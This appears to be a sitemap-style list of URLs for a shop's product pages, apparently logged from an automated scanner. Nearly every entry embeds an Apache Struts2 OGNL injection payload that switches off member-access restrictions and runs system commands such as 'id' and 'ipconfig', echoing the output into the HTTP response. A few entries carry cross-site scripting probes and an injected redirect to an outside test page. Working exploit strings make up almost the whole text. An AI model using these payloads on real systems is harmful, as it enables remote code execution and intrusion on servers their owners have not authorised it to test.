http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=uhjw7 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=ifgpb? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 